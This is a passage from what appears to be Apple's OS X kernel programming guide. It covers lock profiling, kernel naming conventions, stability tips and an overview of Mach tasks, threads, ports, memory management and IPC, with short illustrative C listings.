    void mymutex_unlock(mymutex_t *lock) {
        lock->lockheldtime += (time.tv_sec - lock->starttime);
        lock->heldcount++;
        mutex_unlock(lock->mutex);
    }

This routine has accuracy only to the nearest second, which is not particularly accurate. Ideally, you want to keep track of both time.tv_sec and time.tv_usec and roll the microseconds into seconds as the number gets large.

From this information, you can obtain the average time the lock was held by dividing the total time held by the number of times it was held. The tryfailcount field also tells you how many times the lock could not be taken immediately and the caller had to wait, which is a valuable piece of data when analyzing contention.

As with counter-based profiling, after you have written code to record lock use and contention, you must find a way to obtain that information.
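The finer timing resolution suggested above can be sketched in user space. This is only an illustration, assuming POSIX threads and clock_gettime with CLOCK_MONOTONIC in place of the kernel mutex calls and the kernel time variable; the prof_mutex_t type and the prof_mutex_ functions are hypothetical names, not kernel interfaces. Unlike the listing above, the failure counter is updated only after the lock is held, so the counters themselves are never modified concurrently.

```c
#define _POSIX_C_SOURCE 200809L
#include <pthread.h>
#include <stdint.h>
#include <time.h>

/* Hypothetical profiling wrapper around a pthread mutex. */
typedef struct {
    pthread_mutex_t mutex;
    uint64_t start_ns;        /* time the current holder took the lock */
    uint64_t held_ns;         /* total time the lock has been held */
    uint64_t held_count;      /* number of completed lock/unlock pairs */
    uint64_t try_fail_count;  /* number of times the caller had to wait */
} prof_mutex_t;

/* Monotonic clock reading in nanoseconds. */
static uint64_t now_ns(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}

void prof_mutex_init(prof_mutex_t *l)
{
    pthread_mutex_init(&l->mutex, NULL);
    l->start_ns = 0;
    l->held_ns = 0;
    l->held_count = 0;
    l->try_fail_count = 0;
}

void prof_mutex_lock(prof_mutex_t *l)
{
    /* Try first so that contention can be detected, then block if needed. */
    int contended = (pthread_mutex_trylock(&l->mutex) != 0);
    if (contended)
        pthread_mutex_lock(&l->mutex);

    /* The lock is held from here on, so the counters are safe to update. */
    if (contended)
        l->try_fail_count++;
    l->start_ns = now_ns();
}

void prof_mutex_unlock(prof_mutex_t *l)
{
    l->held_ns += now_ns() - l->start_ns;
    l->held_count++;
    pthread_mutex_unlock(&l->mutex);
}

/* Average hold time: total time held divided by the number of holds.
 * Call this only while no other thread is using the lock. */
double prof_mutex_avg_held_ns(const prof_mutex_t *l)
{
    return l->held_count ? (double)l->held_ns / (double)l->held_count : 0.0;
}
```

Accumulating nanoseconds in a 64-bit counter avoids the need to roll a sub-second field into seconds by hand.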
A sysctl is a good way of obtaining that information, since it is relatively easy to implement and can provide a “snapshot” view of the data structure at any point in time. For more information on adding a sysctl, see “BSD sysctl API” (page 117).

Another way to do lock profiling is to use the built-in ETAP (Event Trace Analysis Package). This package consists of additional code designed for lock profiling. However, since this requires a kernel recompile, it is generally not recommended.

Kernel Programming Style

As described in “Keep Out” (page 13), programming in the kernel is fraught with hazards that can cause instability, crashes, or security holes. In addition to these issues, programming in the kernel has the potential for compatibility problems. If you program only to the interfaces discussed in this document or other Apple documents, you will avoid the majority of these. However, even limiting yourself to documented interfaces does not protect you from a handful of pitfalls.

The biggest potential problem that you face is namespace collision, which occurs when your function, variable, or class name is the same as someone else’s. Since this makes one kernel extension or the other fail to load correctly (in a non-deterministic fashion), Apple has established function naming conventions for C and C++ code within the kernel. These are described in “Standard C Naming Conventions” (page 47) and “C++ Naming Conventions” (page 45), respectively.

In addition to compatibility problems, kernel extensions that misbehave can also dramatically decrease the system’s overall performance or cause crashes. Some of these issues are described in “Performance and Stability Tips” (page 50). For more thorough coverage of performance and stability, you should also read the chapters “Security Considerations” (page 24) and “Performance Considerations” (page 39).

C++ Naming Conventions

Basic I/O Kit C++ naming conventions are defined in the document I/O Kit Device Driver Design Guidelines. This section refines those conventions in ways that should make them more useful to you as a programmer.

Basic Conventions

The primary conventions are as follows:

● Use the Java-style reverse DNS naming convention, substituting underscores for periods. For example, com_apple_foo.
● Avoid the following reserved prefixes:
    ● OS
    ● os
    ● IO
    ● io
    ● Apple
    ● apple
    ● AAPL
    ● aapl

This ensures that you will not collide with classes created by other companies or with future classes added to the operating system by Apple. It does not protect you from other projects created within your company, however, and for this reason, some additional guidelines are suggested.

Additional Guidelines

These additional guidelines are intended to minimize the chance of accidentally breaking your own software and to improve readability of code by developers.

● To avoid namespace collisions, you should prefix the names of classes and families with project names or other reasonably unique prefix codes. For example, if you are working on a video capture driver, and one of its classes is called capture, you will probably encounter a name collision eventually. Instead, you should name the class something like com_mycompany_driver_myproduct_capture. Similarly, names like
To maximize readability, you should use macros to rename classes and families at compile time. For example:

    #define captureClass com_mycompany_driver_myproduct_capture
    #define captureFamily com_mycompany_iokit_myproduct_capture

● Use prefixes in function and method names to make it easier to see relationships between them. For example, Apple uses NS, CF, IO, and other prefixes to indicate that functions belong to specific frameworks.
This might be as simple as prefixing a function with the name of the enclosing or related class, or it might be some other scheme that makes sense for your project.

These are only suggested guidelines. Your company or organization should adopt its own set of guidelines within the constraints of the basic conventions described in the previous section. These guidelines should provide a good starting point.

Standard C Naming Conventions

The naming conventions for C++ have been defined for some time in the document I/O Kit Device Driver Design Guidelines. However, no conventions have been given for standard C code. Because standard C has an even greater chance of namespace collision than C++, it is essential that you follow these guidelines when writing C code for use in the kernel.

Because C does not have the benefit of classes, it is much easier to run into a naming conflict between two functions. For this reason, the following conventions are suggested:

● Declare all functions and (global) variables static where possible to prevent them from being seen in the global namespace. If you need to share these across files within your KEXT, you can achieve a similar effect by declaring them __private_extern__.
● Each function name should use Java-style reverse DNS naming. For example, if your company is apple.com, you should begin each function with com_apple_.
● Follow the reverse DNS name with the name of your project. For example, if you work at Apple and were working on project Schlassen, you would start each function name (in drivers) with com_apple_driver_schlassen_.

Note: The term driver is reserved for actual device drivers. For families, you should instead use iokit. For example, if project Schlassen is an I/O Kit family, function names should all begin with com_apple_iokit_schlassen_.
● Use hierarchical names if you anticipate multiple projects with similar names coming from different parts of your company or organization.
● Use macro expansion to save typing, for example PROJECT_eat could expand to com_apple_driver_schlassen_pickle_eat.
● If you anticipate that the last part of a function name may be the same as the last part of another function name (for example, PROJECT1_eat and PROJECT2_eat), you should change the names to avoid confusion (for example, PROJECT1_eatpickle and PROJECT2_eatburger).
● Avoid the following reserved prefixes:
    ● OS
    ● os
    ● IO
    ● io
    ● Apple
    ● apple
    ● AAPL
    ● aapl
● Avoid conflicting with any names already in the kernel, and do not use prefixes similar to those of existing kernel functions that you may be working with.
● Never begin a function name with an underscore (_).
● Under no circumstances should you use common names for your functions without prefixing them with the name of your project in some form. These are some examples of unacceptable names:
    ● getuseridentity
    ● get_user_info
    ● print
    ● find
    ● search
    ● sort
    ● quicksort
    ● merge
    ● console_log

In short, picking any name that you would normally pick for a function is generally a bad idea, because every other developer writing code is likely to pick the same name for his or her function.

Occasional conflicts are a fact of life. However, by following these few simple rules, you should be able to avoid the majority of common namespace pitfalls.

Commonly Used Functions

One of the most common problems faced when programming in the kernel is use of “standard” functions, things like printf or bcopy. Many commonly used standard C library functions are implemented in the kernel.
In order to use them, however, you need to include the appropriate prototypes, which may be different from the user space prototypes for those functions, and which generally have different names when included from kernel code.

In general, any non-I/O Kit header that you can safely include in the kernel is located in xnu/bsd/sys or xnu/osfmk/mach, although there are a few specialized headers in other places like libkern and libsa. Normal headers (those in /usr/include) cannot be used in the kernel.

Important: If you are writing an I/O Kit KEXT, most of these functions are not what you are looking for. The I/O Kit provides its own APIs for these features, including IOLog, IOMemoryDescriptor, and IOLock. While using the lower-level functionality is not expressly forbidden, it is generally discouraged (though printf is always fine). For more information about APIs available to I/O Kit KEXTs, see Kernel Framework Reference.

Table 7-1 (page 49) lists some commonly used C functions, variables, and types, and gives the location of their prototypes.

Table 7-1 Commonly used C functions

Function name                                          Header path
printf
Buffer cache functions (bread, bwrite, and brelse)
Directory entries
Error numbers
Kernel special variables
Spinlocks
malloc
Queues
Random number generator
bzero, bcopy, copyin, and copyout
timeout and untimeout
Various time functions
Standard type declarations
User credentials
OS and system information

If the standard C function you are trying to use is not in one of these files, chances are the function is not supported for use within the kernel, and you need to implement your code in another way.

The symbols in these header files are divided among multiple symbol sets, depending on the technology area where they were designed to be used.
To use these, you may have to declare dependencies on any of the following:

● com.apple.kernel: You should generally avoid this.
● com.apple.kernel.bsd: BSD portions of the kernel.
● com.apple.kernel.iokit: The I/O Kit.
● com.apple.kernel.libkern: General-purpose functions.
● com.apple.kernel.mach: Mach-specific APIs.
● com.apple.kpi.bsd: BSD portions of the kernel (v10.4 and later).
● com.apple.kpi.iokit: The I/O Kit (v10.4 and later).
● com.apple.kpi.libkern: General-purpose functions (v10.4 and later).
● com.apple.kpi.mach: Mach-specific APIs (v10.4 and later).
● com.apple.kpi.unsupported: Unsupported legacy functionality (v10.4 and later).

Where possible, you should specify a dependency on the KPI version of these symbols. However, these symbols are only available in v10.4 and later. For the I/O Kit and libkern, this should make little difference. For other areas, such as network kernel extensions or file system KEXTs, you must use the KPI versions if you want your extension to load in OS X v10.4 and later.

For a complete list of symbols in any of these dependencies, run nm on the binaries in /System/Library/Extensions/System.kext/PlugIns.

Performance and Stability Tips

This section includes some basic tips on performance and stability. You should read the sections on security and performance for additional information. These tips cover only style issues, not general performance or stability issues.

Performance and Stability Tips

Programming in the kernel is subject to a number of restrictions that do not exist in application programming. The first and most important is the stack size. The kernel has a limited amount of space allocated for thread stacks, which can cause problems if you aren’t aware of the limitation. This means the following:

● Recursion must be bounded (to no more than a few levels).
● Recursion should be rewritten as iterative routines where possible.
● Large stack variables (function local) are dangerous. Do not use them. This also applies to large local arrays.
● Dynamically allocated variables are preferred (using malloc or equivalent) over local variables for objects more than a few bytes in size.
● Functions should have as few arguments as possible.
● Pass pointers to structures, not the broken out elements.
● Don’t use arguments to avoid using global or class variables.
● Do name global variables in a way that protects you from collision.
● C++ functions should be declared static.
● Functions not obeying these rules can cause a kernel panic, or in extreme cases, do not even compile.

In addition to issues of stack size, you should also avoid doing anything that would generate unnecessary load such as polling a device or address. A good example is the use of mutexes rather than spinlocks. You should also structure your locks in such a way to minimize contention and to minimize hold times on the most highly contended locks.

Also, since unused memory (and particularly wired memory) can cause performance degradation, you should be careful to deallocate memory when it is no longer in use, and you should avoid allocating large regions of wired memory. Such allocations may be unavoidable in some applications, but they should be avoided whenever possible and disposed of at the earliest possible opportunity. Allocating large contiguous blocks of memory at boot time is almost never acceptable, because it cannot be released.

There are a number of issues that you should consider when deciding whether to use floating point math or AltiVec vector math in the kernel.

First, the kernel takes a speed penalty whenever floating-point math or AltiVec instructions are used in a system call context (or other similar mechanisms where a user thread executes in a kernel context), as floating-point and AltiVec registers are only maintained when they are in use.
Note: In cases where AltiVec or floating point has already been used in user space in the calling thread, there is no additional penalty for using them in the kernel. Thus, for things like audio drivers, the above does not apply.

In general, you should avoid using floating-point math or AltiVec instructions in the kernel unless doing so will result in a significant speedup. It is not forbidden, but is strongly discouraged.

Second, AltiVec was not supported in the kernel prior to OS X v10.3. It was not possible to detect this support from within the kernel until a later 10.3 software update. If you must deploy your KEXT on earlier versions of OS X, you must either provide a non-AltiVec version of your code or perform the AltiVec instructions in user space.

Finally, AltiVec data stream instructions (dst, dstt, dstst, dss, and dssall) are not supported in the kernel, even for processors that support them in user space. Do not attempt to use them.

If you decide to use AltiVec in the kernel, your code can determine whether the CPU supports AltiVec using the sysctlbyname call to get the hw.optional.altivec property. For more information, see “The sysctlbyname System Call” (page 123).

Stability Tips

● Don’t sleep while holding resources (locks, for example). While this is not forbidden, it is strongly discouraged to avoid deadlock.
● Be careful to allocate and free memory with matching calls. For example, do not use allocation routines from the I/O Kit and deallocation routines from BSD. Likewise, do not use IOMallocContiguous with IOFreePageable.
● Use reference counts to avoid freeing memory that is still in use elsewhere. Be sure to deallocate memory when its reference count reaches zero, but not before.
● Lock objects before operating on them, even to change reference counts.
● Never dereference pointers without verifying that they are not NULL.
In particular, never do this:

    int foo = *argptr;

unless you have already verified that argptr cannot possibly be NULL.
● Test code in sections and try to think up likely edge cases for calculations.
● Never assume that your code will be run only on big endian processors.
● Never assume that the size of an instance of a type will never change. Always use sizeof if you need this information.
● Never assume that a pointer will always be the same size as an int or long.

Style Summary

Kernel programming style is very much a matter of personal preference, and it is not practical to programmatically enforce the guidelines in this chapter. However, we strongly encourage you to follow these guidelines to the maximum extent possible. These guidelines were created based on frequent problems reported by developers writing code in the kernel. No one can force you to use good style in your programming, but if you do not, you do so at your own peril.

Mach Overview

The fundamental services and primitives of the OS X kernel are based on Mach 3.0. Apple has modified and extended Mach to better meet OS X functional and performance goals.

Mach 3.0 was originally conceived as a simple, extensible, communications microkernel. It is capable of running as a stand-alone kernel, with other traditional operating-system services such as I/O, file systems, and networking stacks running as user-mode servers.

However, in OS X, Mach is linked with other kernel components into a single kernel address space. This is primarily for performance; it is much faster to make a direct call between linked components than it is to send messages or do remote procedure calls (RPC) between separate tasks. This modular structure results in a more robust and extensible system than a monolithic kernel would allow, without the performance penalty of a pure microkernel.

Thus in OS X, Mach is not primarily a communication hub between clients and servers. Instead, its value consists of its abstractions, its extensibility, and its flexibility. In particular, Mach provides

● object-based APIs with communication channels (for example, ports) as object references
● highly parallel execution, including preemptively scheduled threads and support for SMP
● a flexible scheduling framework, with support for real-time usage
● a complete set of IPC primitives, including messaging, RPC, synchronization, and notification
● support for large virtual address spaces, shared memory regions, and memory objects backed by persistent store
● proven extensibility and portability, for example across instruction set architectures and in distributed environments
● security and resource management as a fundamental principle of design; all resources are virtualized

Mach Kernel Abstractions

Mach provides a small set of abstractions that have been designed to be both simple and powerful. These are the main kernel abstractions:

● Tasks. The units of resource ownership; each task consists of a virtual address space, a port right namespace, and one or more threads. (Similar to a process.)
● Threads. The units of CPU execution within a task.
● Address space. In conjunction with memory managers, Mach implements the notion of a sparse virtual address space and shared memory.
● Memory objects. The internal units of memory management. Memory objects include named entries and regions; they are representations of potentially persistent data that may be mapped into address spaces.
● Ports. Secure, simplex communication channels, accessible only via send and receive capabilities (known as port rights).
● IPC. Message queues, remote procedure calls, notifications, semaphores, and lock sets.
● Time. Clocks, timers, and waiting.
At the trap level, the interface to most Mach abstractions consists of messages sent to and from kernel ports representing those objects. The trap-level interfaces (such as mach_msg_overwrite_trap) and message formats are themselves abstracted in normal usage by the Mach Interface Generator (MIG). MIG is used to compile procedural interfaces to the message-based APIs, based on descriptions of those APIs.

Tasks and Threads

OS X processes and POSIX threads (pthreads) are implemented on top of Mach tasks and threads, respectively. A thread is a point of control flow in a task. A task exists to provide resources for the threads it contains. This split is made to provide for parallelism and resource sharing.

A thread

● is a point of control flow in a task.
● has access to all of the elements of the containing task.
● executes (potentially) in parallel with other threads, even threads within the same task.
● has minimal state information for low overhead.

A task

● is a collection of system resources. These resources, with the exception of the address space, are referenced by ports. These resources may be shared with other tasks if rights to the ports are so distributed.
● provides a large, potentially sparse address space, referenced by virtual address. Portions of this space may be shared through inheritance or external memory management.
● contains some number of threads.

Note that a task has no life of its own; only threads execute instructions. When it is said that “task Y does X,” what is really meant is that “a thread contained within task Y does X.”

A task is a fairly expensive entity. It exists to be a collection of resources. All of the threads in a task share everything. Two tasks share nothing without an explicit action (although the action is often simple) and some resources (such as port receive rights) cannot be shared between two tasks at all.
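Because processes and pthreads sit on top of tasks and threads, the sharing rules above can be observed from user space. The following is a minimal POSIX sketch, not Mach API code; the function names value_after_thread_write and value_after_child_write are hypothetical. A second thread writes to a global and the creator sees the change, while a child process created with fork writes only to its own copy of the address space.

```c
#include <pthread.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Global that lives in the address space of the calling process. */
static int shared_value = 0;

static void *thread_body(void *arg)
{
    (void)arg;
    shared_value = 1;  /* same address space as the creating thread */
    return NULL;
}

/* Returns the value the caller observes after a second thread wrote 1.
 * Returns -1 if the thread could not be created. */
int value_after_thread_write(void)
{
    pthread_t t;

    shared_value = 0;
    if (pthread_create(&t, NULL, thread_body, NULL) != 0)
        return -1;
    pthread_join(t, NULL);
    return shared_value;
}

/* Returns the value the caller observes after a child process wrote 2.
 * Returns -1 if the child could not be created. */
int value_after_child_write(void)
{
    pid_t pid;

    shared_value = 0;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        shared_value = 2;  /* changes only the child's copy */
        _exit(0);
    }
    waitpid(pid, NULL, 0);
    return shared_value;
}
```

The first function reports the thread's write, and the second reports the original value, since sharing memory between two processes requires an explicit action such as setting up a shared mapping.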
A thread is a fairly lightweight entity. It is fairly cheap to create and has low overhead to operate. This is true because a thread has little state information (mostly its register state). Its owning task bears the burden of resource management. On a multiprocessor computer, it is possible for multiple threads in a task to execute in parallel. Even when parallelism is not the goal, multiple threads have an advantage in that each thread can use a synchronous programming style, instead of attempting asynchronous programming with a single thread attempting to provide multiple services.

A thread is the basic computational entity. A thread belongs to one and only one task that defines its virtual address space. To affect the structure of the address space or to reference any resource other than the address space, the thread must execute a special trap instruction that causes the kernel to perform operations on behalf of the thread or to send a message to some agent on behalf of the thread. In general, these traps manipulate resources associated with the task containing the thread. Requests can be made of the kernel to manipulate these entities: to create them, delete them, and affect their state.

Mach provides a flexible framework for thread-scheduling policies. Early versions of OS X support both time-sharing and fixed-priority policies. A time-sharing thread’s priority is raised and lowered to balance its resource consumption against other time-sharing threads.

Fixed-priority threads execute for a certain quantum of time, and then are put at the end of the queue of threads of equal priority. Setting a fixed priority thread’s quantum level to infinity allows the thread to run until it blocks, or until it is preempted by a thread of higher priority. High priority real-time threads are usually fixed priority.

OS X also provides time constraint scheduling for real-time performance.
This scheduling allows you to specify that your thread must get a certain time quantum within a certain period of time.

Mach scheduling is described further in “Mach Scheduling and Thread Interfaces” (page 77).

Ports, Port Rights, Port Sets, and Port Namespaces

With the exception of the task’s virtual address space, all other Mach resources are accessed through a level of indirection known as a port. A port is an endpoint of a unidirectional communication channel between a client who requests a service and a server who provides the service. If a reply is to be provided to such a service request, a second port must be used. This is comparable to a (unidirectional) pipe in UNIX parlance.

In most cases, the resource that is accessed by the port (that is, named by it) is referred to as an object. Most objects named by a port have a single receiver and (potentially) multiple senders. That is, there is exactly one receive port, and at least one sending port, for a typical object such as a message queue.

The service to be provided by an object is determined by the manager that receives the request sent to the object. It follows that the kernel is the receiver for ports associated with kernel-provided objects and that the receiver for ports associated with task-provided objects is the task providing those objects.

For ports that name task-provided objects, it is possible to change the receiver of requests for that port to a different task, for example by passing the port to that task in a message. A single task may have multiple ports that refer to resources it supports. For that matter, any given entity can have multiple ports that represent it, each implying different sets of permissible operations. For example, many objects have a name port and a control port (sometimes called the privileged port).
Access to the control port allows the object to be manipulated; access to the name port simply names the object so that you can obtain information about it or perform other non-privileged operations against it.

Tasks have permissions to access ports in certain ways (send, receive, send-once); these are called port rights. A port can be accessed only via a right. Ports are often used to grant clients access to objects within Mach. Having the right to send to the object’s IPC port denotes the right to manipulate the object in prescribed ways. As such, port right ownership is the fundamental security mechanism within Mach. Having a right to an object is to have a capability to access or manipulate that object.

Port rights can be copied and moved between tasks via IPC. Doing so, in effect, passes capabilities to some object or server.

One type of object referred to by a port is a port set. As the name suggests, a port set is a set of port rights that can be treated as a single unit when receiving a message or event from any of the members of the set. Port sets permit one thread to wait on a number of message and event sources, for example in work loops.

Traditionally in Mach, the communication channel denoted by a port was always a queue of messages. However, OS X supports additional types of communication channels, and these new types of IPC object are also represented by ports and port rights. See the section “Interprocess Communication (IPC)” (page 58), for more details about messages and other IPC types.

Ports and port rights do not have systemwide names that allow arbitrary ports or rights to be manipulated directly. Ports can be manipulated by a task only if the task has a port right in its port namespace. A port right is specified by a port name, an integer index into a 32-bit port namespace. Each task has associated with it a single port namespace.
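The idea that a port name is only an integer index into a per-task namespace can be illustrated with a small, self-contained C sketch. This is a toy model, not Mach code: the types toy_right and toy_namespace and the functions toy_insert_right, toy_lookup, and toy_namespace_demo are hypothetical names invented for this example, and the fixed table size is an arbitrary assumption.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy model only: every name here is invented for illustration; none is a Mach API. */
enum toy_right_type {
    TOY_RIGHT_NONE = 0,   /* empty slot */
    TOY_RIGHT_SEND,
    TOY_RIGHT_RECEIVE,
    TOY_RIGHT_SEND_ONCE
};

struct toy_right {
    enum toy_right_type type;  /* how the task may use the port */
    int port_id;               /* stands in for the kernel's port object */
};

#define TOY_NAMESPACE_SIZE 8   /* arbitrary size chosen for the sketch */

struct toy_namespace {
    struct toy_right slots[TOY_NAMESPACE_SIZE];  /* one namespace per task */
};

/* Insert a right into the first free slot.
 * Returns the port name (slot index + 1), or 0 if the namespace is full. */
uint32_t toy_insert_right(struct toy_namespace *ns,
                          enum toy_right_type type, int port_id)
{
    for (uint32_t i = 0; i < TOY_NAMESPACE_SIZE; i++) {
        if (ns->slots[i].type == TOY_RIGHT_NONE) {
            ns->slots[i].type = type;
            ns->slots[i].port_id = port_id;
            return i + 1;  /* 0 is reserved to mean "no name" in this model */
        }
    }
    return 0;
}

/* Look up a name. Returns NULL when the task holds no right under that name. */
const struct toy_right *toy_lookup(const struct toy_namespace *ns, uint32_t name)
{
    if (name == 0 || name > TOY_NAMESPACE_SIZE)
        return NULL;
    const struct toy_right *r = &ns->slots[name - 1];
    return (r->type == TOY_RIGHT_NONE) ? NULL : r;
}

/* Two tasks, two namespaces: an integer name is meaningful only in the
 * namespace that holds the corresponding right. */
int toy_namespace_demo(void)
{
    struct toy_namespace task_a = {0}, task_b = {0};
    uint32_t name = toy_insert_right(&task_a, TOY_RIGHT_SEND, 42);

    assert(toy_lookup(&task_a, name) != NULL);  /* task A holds the right */
    assert(toy_lookup(&task_b, name) == NULL);  /* the same integer means nothing to task B */
    return 0;
}
```

In this model a task that merely learns the integer value of another task's port name gains nothing, which mirrors the statement above that ports can be manipulated only through a right held in the task's own namespace.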
Tasks acquire port rights when another task explicitly inserts them into its namespace, when they receive rights in messages, by creating objects that return a right to the object, and via Mach calls for certain special ports (mach_thread_self, mach_task_self, and mach_reply_port).

Memory Management

As with most modern operating systems, Mach provides addressing to large, sparse, virtual address spaces. Runtime access is made via virtual addresses that may not correspond to locations in physical memory at the initial time of the attempted access. Mach is responsible for taking a requested virtual address and assigning it a corresponding location in physical memory. It does so through demand paging.

A range of a virtual address space is populated with data when a memory object is mapped into that range. All data in an address space is ultimately provided through memory objects. Mach asks the owner of a memory object (a pager) for the contents of a page when establishing it in physical memory and returns the possibly modified data to the pager before reclaiming the page. OS X includes two built-in pagers: the default pager and the vnode pager.

The default pager handles nonpersistent memory, known as anonymous memory. Anonymous memory is zero-initialized, and it exists only during the life of a task. The vnode pager maps files into memory objects. Mach exports an interface to memory objects to allow their contents to be contributed by user-mode tasks. This interface is known as the External Memory Management Interface, or EMMI.

The memory management subsystem exports virtual memory handles known as named entries or named memory entries. Like most kernel resources, these are denoted by ports. Having a named memory entry handle allows the owner to map the underlying virtual memory object or to pass the right to map the underlying object to others.
Mapping a named entry in two different tasks results in a shared memory window between the two tasks, thus providing a flexible method for establishing shared memory.

Beginning in OS X v10.1, the EMMI system was enhanced to support “portless” EMMI. In traditional EMMI, two Mach ports were created for each memory region, and likewise two ports for each cached vnode. Portless EMMI, in its initial implementation, replaces this with direct memory references (basically pointers). In a future release, ports will be used for communication with pagers outside the kernel, while using direct references for communication with pagers that reside in kernel space. The net result of these changes is that early versions of portless EMMI do not support pagers running outside of kernel space. This support is expected to be reinstated in a future release.

Address ranges of virtual memory space may also be populated through direct allocation (using vm_allocate). The underlying virtual memory object is anonymous and backed by the default pager. Shared ranges of an address space may also be set up via inheritance. When new tasks are created, they are cloned from a parent. This cloning pertains to the underlying memory address space as well. Mapped portions of objects may be inherited as a copy, or as shared, or not at all, based on attributes associated with the mappings. Mach practices a form of delayed copy known as copy-on-write to optimize the performance of inherited copies on task creation.

Rather than directly copying the range, a copy-on-write optimization is accomplished by protected sharing. The two tasks share the memory to be copied, but with read-only access. When either task attempts to modify a portion of the range, that portion is copied at that time.
This lazy evaluation of memory copies is an important optimization that permits simplifications in several areas, notably the messaging APIs.

One other form of sharing is provided by Mach, through the export of named regions. A named region is a form of a named entry, but instead of being backed by a virtual memory object, it is backed by a virtual map fragment. This fragment may hold mappings to numerous virtual memory objects. It is mappable into other virtual maps, providing a way of inheriting not only a group of virtual memory objects but also their existing mapping relationships. This feature offers significant optimization in task setup, for example when sharing a complex region of the address space used for shared libraries.

Interprocess Communication (IPC)

Communication between tasks is an important element of the Mach philosophy. Mach supports a client/server system structure in which tasks (clients) access services by making requests of other tasks (servers) via messages sent over a communication channel.

The endpoints of these communication channels in Mach are called ports, while port rights denote permission to use the channel. The forms of IPC provided by Mach include

● message queues
● semaphores
● notifications
● lock sets
● remote procedure calls (RPCs)

The type of IPC object denoted by the port determines the operations permissible on that port, and how (and whether) data transfer occurs.

Important: The IPC facilities in OS X are in a state of transition. In early versions of the system, not all of these IPC types may be implemented.

There are two fundamentally different Mach APIs for raw manipulation of ports: the mach_ipc family and the mach_msg family. Within reason, both families may be used with any IPC object; however, the mach_ipc calls are preferred in new code. The mach_ipc calls maintain state information where appropriate in order to support the notion of a transaction.
The mach_msg calls are supported for legacy code but deprecated; they are stateless.

IPC Transactions and Event Dispatching

When a thread calls mach_ipc_dispatch, it repeatedly processes events coming in on the registered port set. These events could be an argument block from an RPC object (as the results of a client’s call), a lock object being taken (as a result of some other thread’s releasing the lock), a notification or semaphore being posted, or a message coming in from a traditional message queue.

These events are handled via callouts from mach_ipc_dispatch. Some events imply a transaction during the lifetime of the callout. In the case of a lock, the state is the ownership of the lock. When the callout returns, the lock is released. In the case of remote procedure calls, the state is the client’s identity, the argument block, and the reply port. When the callout returns, the reply is sent.

When the callout returns, the transaction (if any) is completed, and the thread waits for the next event. The mach_ipc_dispatch facility is intended to support work loops.

Message Queues

Originally, the sole style of interprocess communication in Mach was the message queue. Only one task can hold the receive right for a port denoting a message queue. This one task is allowed to receive (read) messages from the port queue. Multiple tasks can hold rights to the port that allow them to send (write) messages into the queue.

A task communicates with another task by building a data structure that contains a set of data elements and then performing a message-send operation on a port for which it holds send rights. At some later time, the task with receive rights to that port will perform a message-receive operation.
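The single-receiver, queued-delivery discipline described above can be sketched with a small, self-contained C model. This is a toy illustration under stated assumptions, not the Mach messaging API: toy_port, toy_send, toy_receive, and toy_queue_demo are hypothetical names, the queue depth and message size are arbitrary, tasks are represented by plain integers, and send rights are not tracked at all.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/* Toy model only: every name here is invented for illustration; none is a Mach API. */
#define TOY_QUEUE_DEPTH 4    /* arbitrary queue capacity */
#define TOY_MSG_BYTES   32   /* arbitrary fixed message size */

struct toy_port {
    int  receiver_task;                         /* the one task holding the receive right */
    char msgs[TOY_QUEUE_DEPTH][TOY_MSG_BYTES];  /* FIFO storage for queued messages */
    int  head;                                  /* index of the oldest queued message */
    int  count;                                 /* number of queued messages */
};

/* Send: enqueue a copy of the data. Fails when the queue is full.
 * This model does not check send rights. */
bool toy_send(struct toy_port *p, const char *data)
{
    if (p->count == TOY_QUEUE_DEPTH)
        return false;
    char *slot = p->msgs[(p->head + p->count) % TOY_QUEUE_DEPTH];
    strncpy(slot, data, TOY_MSG_BYTES - 1);     /* truncate overlong messages */
    slot[TOY_MSG_BYTES - 1] = '\0';
    p->count++;
    return true;
}

/* Receive: only the task holding the receive right may dequeue,
 * and it always gets the oldest message first. */
bool toy_receive(struct toy_port *p, int task, char out[TOY_MSG_BYTES])
{
    if (task != p->receiver_task || p->count == 0)
        return false;
    memcpy(out, p->msgs[p->head], TOY_MSG_BYTES);
    p->head = (p->head + 1) % TOY_QUEUE_DEPTH;
    p->count--;
    return true;
}

/* The send completes before any receive happens; the receiver picks the
 * message up at some later time. */
int toy_queue_demo(void)
{
    struct toy_port port = { .receiver_task = 1 };
    char buf[TOY_MSG_BYTES];

    assert(toy_send(&port, "request"));       /* sender returns immediately */
    assert(!toy_receive(&port, 2, buf));      /* task 2 holds no receive right */
    assert(toy_receive(&port, 1, buf));       /* task 1 is the sole receiver */
    assert(strcmp(buf, "request") == 0);
    return 0;
}
```

The sender's data is copied into the queue at send time, so the sender may reuse its buffer immediately; the receiver sees the message only when it later performs its own receive.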
A message may consist of some or all of the following:

● pure data
● copies of memory ranges
● port rights
● kernel implicit attributes, such as the sender’s security token

The message transfer is an asynchronous operation. The message is logically copied into the receiving task, possibly with copy-on-write optimizations. Multiple threads within the receiving task can be attempting to receive messages from a given port, but only one thread can receive any given message.

Semaphores

Semaphore IPC objects support wait, post, and post all operations. These are counting semaphores, in that posts are saved (counted) if there are no threads currently waiting in that semaphore’s wait queue. A post all operation wakes up all currently waiting threads.

Notifications

Like semaphores, notification objects also support post and wait operations, but with the addition of a state field. The state is a fixed-size, fixed-format field that is defined when the notification object is created. Each post updates the state field; there is a single state that is overwritten by each post.

Locks

A lock is an object that provides mutually exclusive access to a critical section. The primary interfaces to locks are transaction oriented (see “IPC Transactions and Event Dispatching” (page 59)). During the transaction, the thread holds the lock. When it returns from the transaction, the lock is released.

Remote Procedure Call (RPC) Objects

As the name implies, an RPC object is designed to facilitate and optimize remote procedure calls. The primary interfaces to RPC objects are transaction oriented (see “IPC Transactions and Event Dispatching” (page 59)).

When an RPC object is created, a set of argument block formats is defined.
When an RPC (a send on the object) is made by a client, it causes a message in one of the predefined formats to be created and queued on the object, then eventually passed to the server (the receiver). When the server returns from the transaction, the reply is returned to the sender. Mach tries to optimize the transaction by executing the server using the client’s resources; this is called thread migration.

Time Management

